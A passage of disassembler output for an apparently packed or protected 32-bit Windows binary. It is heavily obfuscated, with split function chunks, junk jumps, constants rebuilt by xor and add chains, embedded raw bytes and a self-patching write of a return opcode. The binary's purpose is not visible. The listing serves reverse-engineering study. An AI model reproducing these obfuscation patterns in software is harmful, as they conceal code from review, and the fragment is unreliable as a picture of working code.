		xchg	ecx, [esp]
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Fh
		mov	ds:dword_446BDC, eax
		retn
; ---------------------------------------------------------------------------

loc_455AFC:				; CODE XREF: y2kk37jd:00443965j
		push	offset loc_448C07
		jmp	locret_450603
; ---------------------------------------------------------------------------

loc_455B06:				; CODE XREF: y2kk37jd:0043FCAFj
		mov	ecx, [esi]

; =============== S U B	R O U T	I N E =======================================



sub_455B08	proc near		; CODE XREF: sub_43FEFB+Cp

; FUNCTION CHUNK AT 0043F431 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442997 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444115 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447A17 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B96E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E44C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F53D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045274A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453629 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004588D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AC1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BDD2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045C5FA SIZE 00000029 BYTES

		xchg	esi, [esp+0]
		pop	esi
		and	ecx, 7
		mov	eax, 1
		shl	eax, cl
		mov	edx, [ebp-14h]
		jmp	loc_45274A
sub_455B08	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_455B1E:				; CODE XREF: y2kk37jd:loc_43F1F2j
					; y2kk37jd:loc_458402j
		jnz	loc_4410F6
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_455B24:				; CODE XREF: sub_44D627+9DB5j
		jmp	locret_4452CF
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_455B29:				; CODE XREF: sub_43F346+15EA6j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B2D

loc_455B2E:				; CODE XREF: sub_454B2D-127BCj
		jmp	sub_443525
; END OF FUNCTION CHUNK	FOR sub_454B2D
; ---------------------------------------------------------------------------
		adc	esi, edx
		jmp	loc_4410E9
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		push	esi
		push	2D8A089Ah
		pop	esi
		xor	esi, 216199B5h
		add	esi, 0FF2BAEC1h
		xor	esi, 660537BEh
		jmp	loc_43FD6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_455B5B:				; CODE XREF: sub_44753E:loc_445860j
		jnz	loc_4461B5
; END OF FUNCTION CHUNK	FOR sub_44753E
; START	OF FUNCTION CHUNK FOR sub_4571A7

loc_455B61:				; CODE XREF: sub_4571A7+Bj
		jmp	loc_43F9AD
; END OF FUNCTION CHUNK	FOR sub_4571A7
; ---------------------------------------------------------------------------
		jnp	loc_43D17E
		mov	[ecx], ebx
		jmp	loc_4461B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_455B73:				; CODE XREF: sub_4458DD:loc_44D2FDj
		and	ebx, 20CEBDA4h

loc_455B79:				; CODE XREF: sub_454413-9BA0j
		xor	ebx, ds:4000E9h
		sub	ebx, 1DF5CAB5h
		xor	ebx, 33FF485Eh
		jmp	loc_451B9C
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------

loc_455B90:				; CODE XREF: y2kk37jd:0044276Dj
					; y2kk37jd:loc_457CF0j
		xor	edi, 0B94A0172h
		add	edi, 0F8CB8BECh
		push	offset loc_45BCC1
		jmp	locret_456335
; ---------------------------------------------------------------------------
		cmp	edi, ebp
		jmp	loc_4531B5
; ---------------------------------------------------------------------------

loc_455BAD:				; DATA XREF: sub_43BD49+B28Bo
		test	al, al
		jz	loc_43D804
		jmp	loc_45AB06
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_455BBA:				; CODE XREF: sub_45136B-F2j
		add	edx, 154B90CFh
		call	sub_4440AB

loc_455BC5:				; CODE XREF: y2kk37jd:00454D88j
		jmp	sub_45A7F7
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------

loc_455BCA:				; CODE XREF: y2kk37jd:loc_448689j
		pop	ecx
		xchg	ebx, [esp]
		mov	eax, ebx
		pop	ebx
		pop	ebx
		jmp	loc_43DE42
; ---------------------------------------------------------------------------

loc_455BD7:				; DATA XREF: sub_44CF09:loc_441FA1o
		jmp	loc_44D1BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_455BDC:				; CODE XREF: y2kk37jd:0043C356j
					; sub_44CF09-776j
		xchg	ebx, [esp+0]
		push	ebx
		pop	ecx
		pop	ebx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_455BE4:				; CODE XREF: sub_451A35-15E6Bj
		jmp	loc_43DEAB
; END OF FUNCTION CHUNK	FOR sub_451A35

; =============== S U B	R O U T	I N E =======================================



sub_455BE9	proc near		; CODE XREF: sub_442F9C-3E63j
					; y2kk37jd:00444CAFp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044B68D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044BCB5 SIZE 00000005 BYTES

		push	ebx
		jmp	loc_44BCB5
sub_455BE9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_455BEF:				; CODE XREF: sub_4562E5:loc_458C89j
		add	eax, 4C085028h
		xchg	eax, [esp+0Ch+var_C]
		call	sub_447832
		push	eax
		call	dword ptr [ebp-4]
		test	eax, eax
		jmp	loc_45760F
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_455C08:				; CODE XREF: sub_445568+D069j
		shr	ebp, 1
		jmp	loc_44A43C
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
		adc	edi, ecx
		jmp	sub_44DAA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_455C16:				; CODE XREF: sub_43DD0E:loc_4492E6j
		xor	ecx, 0F323C6F5h
		add	ecx, 5816FF8Fh
		cmp	ecx, 0C1015DDDh
		jmp	loc_43E72E
; END OF FUNCTION CHUNK	FOR sub_43DD0E

; =============== S U B	R O U T	I N E =======================================



sub_455C2D	proc near		; DATA XREF: sub_44229C+6204o

; FUNCTION CHUNK AT 0043FDB7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444F08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515B8 SIZE 0000000B BYTES

		add	eax, 7109414Bh
		js	loc_444F08
		call	sub_44F930

loc_455C3E:				; CODE XREF: sub_445226+26DCj
		jmp	loc_43FDB7
sub_455C2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_455C43:				; CODE XREF: y2kk37jd:0044E0ECj
		sbb	ecx, 97C00BA3h
		xchg	edi, [esi]
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_455C4B:				; CODE XREF: sub_43D41D+B8FAj
		push	offset sub_45C2D2
		jmp	loc_447908
; END OF FUNCTION CHUNK	FOR sub_43D41D

; =============== S U B	R O U T	I N E =======================================



sub_455C55	proc near		; CODE XREF: sub_451A35:loc_43BBC4j
					; sub_451A35-13B79j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004478C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456BBF SIZE 0000000E BYTES

		push	ebx
		push	0D84FD2CEh
		pop	ebx
		add	ebx, 14509952h
		and	ebx, 87197969h

loc_455C68:				; CODE XREF: y2kk37jd:00444866j
		or	ebx, 516B59CFh
		xor	ebx, 47B2A77Bh
		jmp	loc_4478C6
sub_455C55	endp


; =============== S U B	R O U T	I N E =======================================



sub_455C79	proc near		; CODE XREF: sub_445568+5A5p
					; y2kk37jd:0045115Bj

; FUNCTION CHUNK AT 0043D75F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E34C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FCEA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004406FE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444F33 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044636B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CE1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045769B SIZE 00000017 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, edi
		add	al, ah
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp+0]
		jmp	loc_44CE1D
sub_455C79	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_455C8C:				; CODE XREF: sub_45B7AA-AB93j
		or	ebx, esi
		shr	esi, 10h
		cmp	ebx, 7F172DDBh
		jmp	loc_45B85F
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456BAC

loc_455C9C:				; CODE XREF: sub_456BAC:loc_443820j
		add	ecx, 0AACCFE2Fh
		mov	[ecx], eax
		pop	ecx
; END OF FUNCTION CHUNK	FOR sub_456BAC
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455CA5:				; CODE XREF: sub_445226:loc_45632Aj
		pushf
		jmp	loc_43F49E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_455CAB:				; CODE XREF: sub_43E0DE+10543j
		xor	ecx, ebp
		rol	ebx, 19h
		shr	edx, 1Dh

loc_455CB3:				; CODE XREF: sub_43E0DE+178F0j
		rol	ebx, 3
		add	ebx, 5BEDCB2Bh
		add	eax, ebx
		jmp	loc_44E038
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465C3

loc_455CC3:				; CODE XREF: sub_4465C3-5F6j
		jb	sub_45B4CB
; END OF FUNCTION CHUNK	FOR sub_4465C3
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_455CC9:				; CODE XREF: sub_43CBDE+181B0j
		sub	esi, eax

loc_455CCB:				; CODE XREF: sub_4465C3:loc_443B58j
		call	sub_45405E
		call	sub_45AFC4

loc_455CD5:				; CODE XREF: sub_44723A+127A0j
		jmp	loc_456318
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_455CDA:				; CODE XREF: sub_43F346+12ED9j
		jmp	loc_43FA49
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
		mov	ebx, [edi]
		jmp	sub_43D33A
; ---------------------------------------------------------------------------
		call	sub_45405E
		push	9DF77A7Ah
		pop	edx
		xor	edx, 0ACF08384h
		or	edx, 4189B67Ah
		xor	edx, 86492F06h
		push	ebx
		jmp	loc_44929F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_455D09:				; CODE XREF: sub_44107E:loc_45BF69j
		push	9306EF92h
		shr	ecx, 1Bh
		jmp	loc_43D4E9
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_455D16:				; DATA XREF: sub_4576F6+Bo
		mov	edx, [ebp-18h]
		shr	edx, 3
		mov	ecx, ds:dword_4516B8
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jmp	loc_4560F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_455D2D:				; CODE XREF: sub_44A6B5:loc_459A8Fj
		mov	[esi], ebx
		shr	esi, 16h
		jmp	loc_44DFF4
; END OF FUNCTION CHUNK	FOR sub_44A6B5

; =============== S U B	R O U T	I N E =======================================



sub_455D37	proc near		; CODE XREF: y2kk37jd:0043D9FCj
					; sub_445226:loc_4438E2p
		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		lea	eax, sub_446EA8
		push	offset sub_44B233
		jmp	loc_458761
sub_455D37	endp

; ---------------------------------------------------------------------------
		jmp	ds:dword_41E0A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_455D52:				; CODE XREF: sub_447F91+12DB1j
		jmp	loc_45C202
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_455D57:				; CODE XREF: sub_453B38+9j
		jmp	loc_45378E
; END OF FUNCTION CHUNK	FOR sub_453B38
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD	"+" TO EXPAND]
		db 89h,	0C2h, 5Ah
		dd 8B5AFFFEh, 8B562404h, 243487F2h, 0FE951CE9h,	873287FFh
		dd 28F3E9F9h, 1F8BFFFFh, 0FFE007E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_455D81:				; CODE XREF: sub_457A46:loc_448A43j
		cdq
		jmp	loc_455294
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------

loc_455D87:				; CODE XREF: y2kk37jd:00455185j
		jnz	loc_44433C
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_455D8D:				; CODE XREF: sub_4490B4:loc_4552E3j
		and	esi, 455EC9CEh
		jmp	loc_43BE1C
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------

loc_455D98:				; CODE XREF: y2kk37jd:00459313j
		pushf
		call	sub_43F728

loc_455D9E:				; CODE XREF: y2kk37jd:0043DC69j
		jmp	loc_458EAD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_455DA3:				; CODE XREF: sub_45B7AA-A4F2j
		jz	loc_456656
		jmp	loc_43E347
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_455DAE:				; CODE XREF: sub_44113A+18A30j
		add	edi, 9F5F8D3Eh
		jmp	loc_43EAC0
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBFB

loc_455DB9:				; CODE XREF: sub_44FBFB+4j
		call	sub_455DD8
		mov	ds:dword_449C1C, eax
		call	sub_45405E
		mov	edx, 0A2CD59D9h
		call	sub_455DD8
		mov	ds:dword_44FC84, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44FBFB

; =============== S U B	R O U T	I N E =======================================



sub_455DD8	proc near		; CODE XREF: y2kk37jd:00449242p
					; sub_44977F+Fp ...

; FUNCTION CHUNK AT 0043DC07 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DB2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456CC1 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_456CC1
sub_455DD8	endp


; =============== S U B	R O U T	I N E =======================================



sub_455DDE	proc near		; DATA XREF: sub_43D522:loc_454DFAo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004422D8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044561E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C35F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB83 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CDC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454763 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459971 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B9D0 SIZE 00000014 BYTES

		push	ecx
		mov	byte ptr [ebp-1], 0
		mov	eax, cs
		xor	al, al
		or	eax, eax
		jnz	loc_44CB83
		jmp	loc_454763
sub_455DDE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_455DF4:				; CODE XREF: y2kk37jd:0044CA60j
		jno	loc_44C6C6
		sub	ebp, 2AD98790h
		jmp	loc_440051
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 70h
		db 4Bh,	2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_455E0B	proc near		; CODE XREF: sub_43BF31+Fp

; FUNCTION CHUNK AT 0043DFCD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044116E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447199 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451A4B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459517 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, ds:dword_4516B8
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		jmp	loc_447199
sub_455E0B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_455E23:				; CODE XREF: y2kk37jd:0043DADFj
		jl	loc_455122
; START	OF FUNCTION CHUNK FOR sub_43E2D2

loc_455E29:				; CODE XREF: sub_43E2D2+13j
		jmp	loc_44DEBA
; END OF FUNCTION CHUNK	FOR sub_43E2D2
; ---------------------------------------------------------------------------
		rol	eax, 1Ah
		xor	edx, edi
		jmp	loc_455122
; ---------------------------------------------------------------------------

loc_455E38:				; CODE XREF: y2kk37jd:0044929Aj
		jnz	loc_45BCE0
		jmp	loc_453F68
; ---------------------------------------------------------------------------
		sbb	esi, 0BDE6C96Fh
		jmp	sub_4413E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_455E4E:				; CODE XREF: sub_44D302+41A5j
					; sub_44D302:loc_45BA9Bj
		test	byte ptr [ebp-8], 20h
		jz	loc_452E62
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_455E6A
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_441114
; END OF FUNCTION CHUNK	FOR sub_44D302

; =============== S U B	R O U T	I N E =======================================



sub_455E6A	proc near		; CODE XREF: sub_44D302+8B5Ap

; FUNCTION CHUNK AT 00446CB0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455717 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_455717
sub_455E6A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443278

loc_455E70:				; CODE XREF: sub_443278:loc_45685Cj
		call	sub_43F2F2

loc_455E75:				; CODE XREF: sub_4448E2+8218j
		jmp	nullsub_187
; END OF FUNCTION CHUNK	FOR sub_443278
; ---------------------------------------------------------------------------

loc_455E7A:				; CODE XREF: y2kk37jd:0043CF17j
		jmp	loc_454D15
; ---------------------------------------------------------------------------

loc_455E7F:				; CODE XREF: y2kk37jd:loc_4445FAj
		js	loc_45AD90
		push	edx
		jmp	loc_44A814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_455E8B:				; CODE XREF: sub_4552EB:loc_455541j
		add	eax, 2CF34275h
		and	eax, 4F729462h
		add	eax, 4DC491FFh
		jnz	loc_452819
		adc	eax, 0B35B2839h
		jmp	loc_452808
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45623A

loc_455EAE:				; CODE XREF: sub_45623A+1j
		mov	ebp, esp
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_4470D0
		call	sub_43D58E
; END OF FUNCTION CHUNK	FOR sub_45623A
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_455EBE:				; CODE XREF: sub_4486E1+1Aj
		jmp	loc_43FA31
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------

loc_455EC3:				; CODE XREF: y2kk37jd:00445DA1j
		jmp	loc_44C90C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455EC8:				; CODE XREF: sub_445226-5182j
		jmp	loc_44D326
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_455ECD:				; CODE XREF: y2kk37jd:0044F110j
		jz	loc_43C8C6
		jmp	loc_443F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_455ED8:				; CODE XREF: sub_45689F+4912j
		call	sub_4517E6
; END OF FUNCTION CHUNK	FOR sub_45689F
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_455EDD:				; CODE XREF: sub_45024B:loc_45025Dj
		cmp	edx, 7C61090Eh

loc_455EE3:				; CODE XREF: sub_454454+19j
		jz	loc_448A1B

loc_455EE9:				; CODE XREF: sub_448A12-D9CBj
					; y2kk37jd:00448DAEj ...
		jno	loc_45AA64
		or	eax, eax
		jz	loc_448A19
		cmp	eax, 0FFFFFFFFh
		jz	loc_448A19
		mov	eax, [eax]
		jmp	loc_45A015
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
		call	sub_45AAF1
; START	OF FUNCTION CHUNK FOR sub_445568

loc_455F0C:				; CODE XREF: sub_445568+14AEDj
		jmp	loc_4525CB
; END OF FUNCTION CHUNK	FOR sub_445568
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_455F12:				; CODE XREF: sub_442A84+5A08j
		jmp	loc_43F24D
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_455F17:				; CODE XREF: sub_4448E2+28D7j
		jmp	nullsub_275
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455F1C:				; CODE XREF: sub_445226-89F2j
		jmp	loc_45207F
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		adc	ebx, 3FE3D632h
		jmp	sub_459695
; ---------------------------------------------------------------------------

loc_455F2C:				; DATA XREF: sub_454539+3FD2o
		call	sub_442C3E
		mov	ds:off_41E154, eax
		lea	eax, sub_454539
		mov	byte ptr [eax],	0C3h
		jmp	loc_445D8F

; =============== S U B	R O U T	I N E =======================================



sub_455F45	proc near		; CODE XREF: sub_406110+247p
					; sub_406110+2A2p ...

; FUNCTION CHUNK AT 00452695 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045BB4B SIZE 00000005 BYTES

		call	sub_4526A0
		jmp	loc_45BB4B
sub_455F45	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_455F4F:				; CODE XREF: sub_445568:loc_44C003j
		jz	loc_440C6F
		jmp	loc_450C2D
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
		jb	loc_45C520
		and	edi, esi
		jmp	sub_43B0CB
; ---------------------------------------------------------------------------

loc_455F67:				; CODE XREF: y2kk37jd:0044F75Aj
		jnp	sub_44714C
		jo	sub_459AFA
		jl	loc_44865F
		jmp	loc_44612B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_455F7E:				; CODE XREF: sub_4440AB-7022j
		mov	edi, ebx
; END OF FUNCTION CHUNK	FOR sub_4440AB
; START	OF FUNCTION CHUNK FOR sub_45709E

loc_455F80:				; CODE XREF: sub_45709E:loc_44B52Cj
		sub	ebx, 91144637h
		add	ebx, 3E0D4E46h
		sub	ebx, 0F5D6A9DCh
		add	ebx, 0C92CBB9h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_45709E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_455FA0:				; CODE XREF: sub_43B8D6:loc_447265j
		jnz	loc_457628
		jmp	loc_4491C3
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AFD

loc_455FAC:				; CODE XREF: sub_443AFD+102EAj
		jmp	sub_443AFD
; END OF FUNCTION CHUNK	FOR sub_443AFD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454210

loc_455FB1:				; CODE XREF: sub_454210-586Dj
		jmp	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_454210
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_253. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_455FB7:				; CODE XREF: sub_43DF1F+1D35Aj
		jmp	sub_43D61E
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------

loc_455FBC:				; CODE XREF: y2kk37jd:004590ABj
		jmp	loc_44C02A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_455FC1:				; CODE XREF: sub_445568+Ej
		jmp	loc_45A04D
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_455FC6:				; CODE XREF: y2kk37jd:00459FB1j
		xchg	esi, [edi]
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_455FC8:				; CODE XREF: sub_442F52:loc_459FA4j
		add	eax, 6E8C9C1Fh
		rol	eax, 1Eh
		sub	eax, 1F513FA7h
		jmp	loc_4536CA
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_455FDC:				; CODE XREF: sub_43BD49+1E5E8j
					; DATA XREF: y2kk37jd:00443D06o
		add	esi, 51C51E4Ah
		xchg	esi, [esp-4+arg_0]
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_43BD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_455FEA:				; CODE XREF: sub_43DE8B+3D18j
					; sub_43F346:loc_4455D8j
		jle	loc_457C12
		adc	edx, 31E7DF51h
		jmp	loc_45A31A
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_455FFB:				; CODE XREF: sub_456809-12F9Fj
		or	ebp, esi
		popf
		jmp	loc_447418
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE26

loc_456003:				; CODE XREF: sub_43FE26:loc_45A9D9j
		call	sub_43DC73
; END OF FUNCTION CHUNK	FOR sub_43FE26
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_456008:				; CODE XREF: sub_43F618+BAD3j
		jmp	loc_448118
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45600D:				; CODE XREF: sub_445226+A7F1j
		rol	esi, 0Ch
		adc	edi, edx
		sub	ebx, ebp

loc_456014:				; CODE XREF: sub_445226:loc_4411FCj
		mov	byte ptr [ebp-806h], 0
		mov	byte ptr [ebp-805h], 0
		call	sub_445F64

loc_456027:				; CODE XREF: sub_45B18C+10j
		jmp	loc_449D20
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45602C:				; CODE XREF: y2kk37jd:loc_43D000j
		mov	edx, eax
		xchg	edx, [esp]
		push	edx
		push	ebp
		jmp	loc_445C91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_456038:				; CODE XREF: sub_4411C3:loc_446093j
		push	0FD9111EFh
		pop	esi
		or	esi, 813DF55Eh
		rol	esi, 18h
		jmp	loc_441672
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_45604C:				; CODE XREF: sub_44113A+EA13j
		ja	loc_440F7D
		shl	ebp, 0Fh
		popf
		jmp	loc_4440CC
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45605B:				; CODE XREF: sub_445226:loc_44DAECj
		sub	al, 99h

loc_45605D:				; CODE XREF: y2kk37jd:00441748j
		push	0B2B46194h
		jmp	loc_44CB5D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_456067:				; CODE XREF: y2kk37jd:00447851j
		jnp	loc_447AB5

loc_45606D:				; CODE XREF: y2kk37jd:0043CD1Bj
		add	ebx, 0C88DF82Bh
		mov	[ebx], eax
		pop	ebx
		push	offset loc_459E41
		jmp	locret_459E14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_456080:				; CODE XREF: sub_445C40-7A5Cj
		push	offset loc_449580
		jmp	loc_45787F
; END OF FUNCTION CHUNK	FOR sub_445C40
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_295. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_45608B:				; CODE XREF: sub_4554E9-17437j
